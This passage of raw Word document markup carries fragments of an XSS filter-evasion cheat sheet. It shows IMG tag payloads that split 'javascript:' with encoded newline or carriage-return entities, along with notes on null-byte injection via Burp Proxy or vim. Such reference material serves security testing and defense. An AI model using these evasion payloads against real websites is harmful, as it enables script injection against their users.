      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chart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details.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9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>four</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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illustrate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vector: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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2291715" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1307" name="Group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1715" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="3609" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1308" name="Freeform 1310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3609" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5202 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3609"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3609"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3609"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3609"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3609"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3609"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3609"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5202 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3609"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5223 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3609"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5223 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3609"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5205 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3609"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5202 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3609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609" h="183">
                                <a:moveTo>
                                  <a:pt x="358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588" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3591" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="358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Text Box 1309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360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SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt;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8" o:spid="_x0000_s1128" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:180.45pt;height:9.15pt;z-index:-15710208;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="360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">
                <v:shape id="Freeform 1310" o:spid="_x0000_s1129" style="position:absolute;left:1614;top:165;width:3609;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="360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AsFccA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74L/YRmhN7OJhSLRVUQtFKGHRgv1NmSn&#10;SWp2NmS3mvbXdw4FbzO8N+99s1wPrlVX6kPj2UCWpKCIS28brgycjs/TOagQkS22nsnADwVYr8aj&#10;JebW3/iNrkWslIRwyNFAHWOXax3KmhyGxHfEon363mGUta+07fEm4a7VszR90g4bloYaO9rWVF6K&#10;b2fgnPHXPvs9fPjCHXavbbd/3+wuxjxMhs0CVKQh3s3/1y9W8B9TwZVvZAS9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ALBXHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m3588,182l21,182r-3,l,161r,-3l,21,21,,3588,r21,21l3609,161r-18,21l3588,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3588,348;21,348;18,348;0,327;0,324;0,187;21,166;3588,166;3609,187;3609,327;3591,348;3588,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1309" o:spid="_x0000_s1130" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:360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epWcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H/g/hBP2NhM3kLUaRWSDwUBW64OPZ3O2&#10;webSNZl2/70ZDHy7j+/nLVaDa8WF+mA9a5hOFAjiyhvLtYZ9+f70CiJEZIOtZ9LwSwFWy9HDAnPj&#10;r1zQZRdrkUI45KihibHLpQxVQw7DxHfEiTv53mFMsK+l6fGawl0rn5WaSYeWU0ODHW0aqs67H6dh&#10;feDizX5vj1/FqbBlmSn+nJ21fhwP6zmISEO8i//dHybNf1EZ/H2TTp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HqVn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7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SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt;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Embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Carriage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Return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Break-up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS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26" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="206"/>
      </w:pPr>
      <w:r>
        <w:t>(Note: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above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>am</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>making</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>longer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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because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zeros</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could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omitted.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Often</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>I've</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>seen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filters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assume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hex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dec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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characters.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real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rule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1-7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>characters.):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="12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116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2291715" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1304" name="Group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1715" cy="116205"/>
                          <a:chOff x="1614" y="183"/>
                          <a:chExt cx="3609" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1305" name="Freeform 1307"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="183"/>
                            <a:ext cx="3609" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5202 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3609"/>
                              <a:gd name="T2" fmla="+- 0 365 183"/>
                              <a:gd name="T3" fmla="*/ 365 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3609"/>
                              <a:gd name="T6" fmla="+- 0 365 183"/>
                              <a:gd name="T7" fmla="*/ 365 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3609"/>
                              <a:gd name="T10" fmla="+- 0 365 183"/>
                              <a:gd name="T11" fmla="*/ 365 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3609"/>
                              <a:gd name="T14" fmla="+- 0 344 183"/>
                              <a:gd name="T15" fmla="*/ 344 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3609"/>
                              <a:gd name="T18" fmla="+- 0 341 183"/>
                              <a:gd name="T19" fmla="*/ 341 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3609"/>
                              <a:gd name="T22" fmla="+- 0 204 183"/>
                              <a:gd name="T23" fmla="*/ 204 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3609"/>
                              <a:gd name="T26" fmla="+- 0 183 183"/>
                              <a:gd name="T27" fmla="*/ 183 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5202 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3609"/>
                              <a:gd name="T30" fmla="+- 0 183 183"/>
                              <a:gd name="T31" fmla="*/ 183 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5223 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3609"/>
                              <a:gd name="T34" fmla="+- 0 204 183"/>
                              <a:gd name="T35" fmla="*/ 204 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5223 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3609"/>
                              <a:gd name="T38" fmla="+- 0 344 183"/>
                              <a:gd name="T39" fmla="*/ 344 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5205 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3609"/>
                              <a:gd name="T42" fmla="+- 0 365 183"/>
                              <a:gd name="T43" fmla="*/ 365 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5202 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3609"/>
                              <a:gd name="T46" fmla="+- 0 365 183"/>
                              <a:gd name="T47" fmla="*/ 36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609" h="183">
                                <a:moveTo>
                                  <a:pt x="358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588" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3591" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="358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Text Box 130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83"/>
                            <a:ext cx="360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SRC="jav&amp;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#x0D;ascript:alert('XSS');"&gt;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5" o:spid="_x0000_s1131" style="position:absolute;margin-left:80.7pt;margin-top:9.15pt;width:180.45pt;height:9.15pt;z-index:-15709696;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,183" coordsize="360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">
                <v:shape id="Freeform 1307" o:spid="_x0000_s1132" style="position:absolute;left:1614;top:183;width:3609;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="360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GDi8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPywjedBNFkdRVxAeI4KGphfY2ZMck&#10;mp0N2VWjv94tFHqbj+85s0VrKnGjxpWWFcSDCARxZnXJuYLj57Y/BeE8ssbKMil4kIPFvPM2w0Tb&#10;O3/QLfW5CCHsElRQeF8nUrqsIINuYGviwJ1sY9AH2ORSN3gP4aaSwyiaSIMlh4YCa1oVlF3Sq1Hw&#10;E/N5Ez/33zY1+/Whqjdfy/VFqV63Xb6D8NT6f/Gfe6fD/FE0ht9vwgly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Bg4vEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3588,182l21,182r-3,l,161r,-3l,21,21,,3588,r21,21l3609,161r-18,21l3588,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3588,365;21,365;18,365;0,344;0,341;0,204;21,183;3588,183;3609,204;3609,344;3591,365;3588,365" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1306" o:spid="_x0000_s1133" type="#_x0000_t202" style="position:absolute;left:1614;top:183;width:360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9K8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H+x/CCfsbSZuUFw1iowNhIFYu4c9ns3Z&#10;BptL10Tt/nsjCHu7j+/nzZeDa8WZ+mA9a5iMFQjiyhvLtYbv8vN5CiJEZIOtZ9LwRwGWi8eHOebG&#10;X7ig8y7WIoVwyFFDE2OXSxmqhhyGse+IE3fwvcOYYF9L0+MlhbtWviiVSYeWU0ODHb03VB13J6dh&#10;9cPFh/3d7LfFobBl+ab4Kztq/TQaVjMQkYb4L7671ybNf1UZ3L5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g9K8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7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SRC="jav&amp;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#x0D;ascript:alert('XSS');"&gt;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Null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>breaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Directive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ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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work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vectors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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above,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need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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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Burp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1468"/>
        </w:tabs>
        <w:spacing w:before="76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48384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1626870</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>52070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="208915" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1301" name="Group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915" cy="116205"/>
                          <a:chOff x="2562" y="82"/>
                          <a:chExt cx="329" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1302" name="Picture 1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2" y="82"/>
                            <a:ext cx="32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3" name="Text Box 1303"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2562" y="82"/>
                            <a:ext cx="32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%00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2" o:spid="_x0000_s1134" style="position:absolute;left:0;text-align:left;margin-left:128.1pt;margin-top:4.1pt;width:16.45pt;height:9.15pt;z-index:-17668096;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="2562,82" coordsize="329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04" o:spid="_x0000_s1135" type="#_x0000_t75" style="position:absolute;left:2562;top:82;width:329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Ox8nFAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrAjEQhe+C/yGM0JsmWpCyGkVEaWl7&#10;0a54HTfj7upmsiSpbv99IxR6m+G9982b+bKzjbiRD7VjDeORAkFcOFNzqSH/2g5fQISIbLBxTBp+&#10;KMBy0e/NMTPuzju67WMpEoRDhhqqGNtMylBUZDGMXEuctLPzFmNafSmNx3uC20ZOlJpKizWnCxW2&#10;tK6ouO6/baIc6eLfXz83rKb5+XBSH97nJ62fBt1qBiJSF//Nf+k3k+o/qwk8vkkjyM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DsfJxQAAAN0AAAAPAAAAAAAAAAAAAAAA&#10;AJ8CAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAkQMAAAAA&#10;">
                  <v:imagedata r:id="rId13" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 1303" o:spid="_x0000_s1136" type="#_x0000_t202" style="position:absolute;left:2562;top:82;width:32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+es8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYQq9aVIFsVujiCgUhNJ1e+hxuhl3&#10;g5vJuom6/vumIHibx/uc+bJ3jbhQF6xnDa8jBYK49MZypeG72A5nIEJENth4Jg03CrBcPA3mmBl/&#10;5Zwu+1iJFMIhQw11jG0mZShrchhGviVO3MF3DmOCXSVNh9cU7ho5VmoqHVpODTW2tK6pPO7PTsPq&#10;h/ONPX3+fuWH3BbFm+Ld9Kj1y3O/egcRqY8P8d39YdL8iZrA/zfp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+es8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%00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648896" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5862320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>52070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="254635" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1300" name="Freeform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4635" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 9612 9232"/>
                            <a:gd name="T1" fmla="*/ T0 w 401"/>
                            <a:gd name="T2" fmla="+- 0 264 82"/>
                            <a:gd name="T3" fmla="*/ 264 h 183"/>
                            <a:gd name="T4" fmla="+- 0 9254 9232"/>
                            <a:gd name="T5" fmla="*/ T4 w 401"/>
                            <a:gd name="T6" fmla="+- 0 264 82"/>
                            <a:gd name="T7" fmla="*/ 264 h 183"/>
                            <a:gd name="T8" fmla="+- 0 9250 9232"/>
                            <a:gd name="T9" fmla="*/ T8 w 401"/>
                            <a:gd name="T10" fmla="+- 0 264 82"/>
                            <a:gd name="T11" fmla="*/ 264 h 183"/>
                            <a:gd name="T12" fmla="+- 0 9232 9232"/>
                            <a:gd name="T13" fmla="*/ T12 w 401"/>
                            <a:gd name="T14" fmla="+- 0 243 82"/>
                            <a:gd name="T15" fmla="*/ 243 h 183"/>
                            <a:gd name="T16" fmla="+- 0 9232 9232"/>
                            <a:gd name="T17" fmla="*/ T16 w 401"/>
                            <a:gd name="T18" fmla="+- 0 240 82"/>
                            <a:gd name="T19" fmla="*/ 240 h 183"/>
                            <a:gd name="T20" fmla="+- 0 9232 9232"/>
                            <a:gd name="T21" fmla="*/ T20 w 401"/>
                            <a:gd name="T22" fmla="+- 0 103 82"/>
                            <a:gd name="T23" fmla="*/ 103 h 183"/>
                            <a:gd name="T24" fmla="+- 0 9254 9232"/>
                            <a:gd name="T25" fmla="*/ T24 w 401"/>
                            <a:gd name="T26" fmla="+- 0 82 82"/>
                            <a:gd name="T27" fmla="*/ 82 h 183"/>
                            <a:gd name="T28" fmla="+- 0 9612 9232"/>
                            <a:gd name="T29" fmla="*/ T28 w 401"/>
                            <a:gd name="T30" fmla="+- 0 82 82"/>
                            <a:gd name="T31" fmla="*/ 82 h 183"/>
                            <a:gd name="T32" fmla="+- 0 9633 9232"/>
                            <a:gd name="T33" fmla="*/ T32 w 401"/>
                            <a:gd name="T34" fmla="+- 0 103 82"/>
                            <a:gd name="T35" fmla="*/ 103 h 183"/>
                            <a:gd name="T36" fmla="+- 0 9633 9232"/>
                            <a:gd name="T37" fmla="*/ T36 w 401"/>
                            <a:gd name="T38" fmla="+- 0 243 82"/>
                            <a:gd name="T39" fmla="*/ 243 h 183"/>
                            <a:gd name="T40" fmla="+- 0 9615 9232"/>
                            <a:gd name="T41" fmla="*/ T40 w 401"/>
                            <a:gd name="T42" fmla="+- 0 264 82"/>
                            <a:gd name="T43" fmla="*/ 264 h 183"/>
                            <a:gd name="T44" fmla="+- 0 9612 9232"/>
                            <a:gd name="T45" fmla="*/ T44 w 401"/>
                            <a:gd name="T46" fmla="+- 0 264 82"/>
                            <a:gd name="T47" fmla="*/ 264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401" h="183">
                              <a:moveTo>
                                <a:pt x="380" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="22" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="158"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="22" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="380" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="401" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="401" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="383" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="380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7D41B" id="Freeform 1301" o:spid="_x0000_s1026" style="position:absolute;margin-left:461.6pt;margin-top:4.1pt;width:20.05pt;height:9.15pt;z-index:-1766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" path="m380,182r-358,l18,182,,161r,-3l,21,22,,380,r21,21l401,161r-18,21l380,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="241300,167640;13970,167640;11430,167640;0,154305;0,152400;0,65405;13970,52070;241300,52070;254635,65405;254635,154305;243205,167640;241300,167640" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Proxy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use</w:t>
      </w:r>
      <w:r>
        <w:tab/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URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>string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want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write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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own</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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either</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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vim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>^V^@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>will</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="63"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>produce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null)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program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generate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file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Okay,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lied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>again,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>older</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>versions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Opera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(circa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
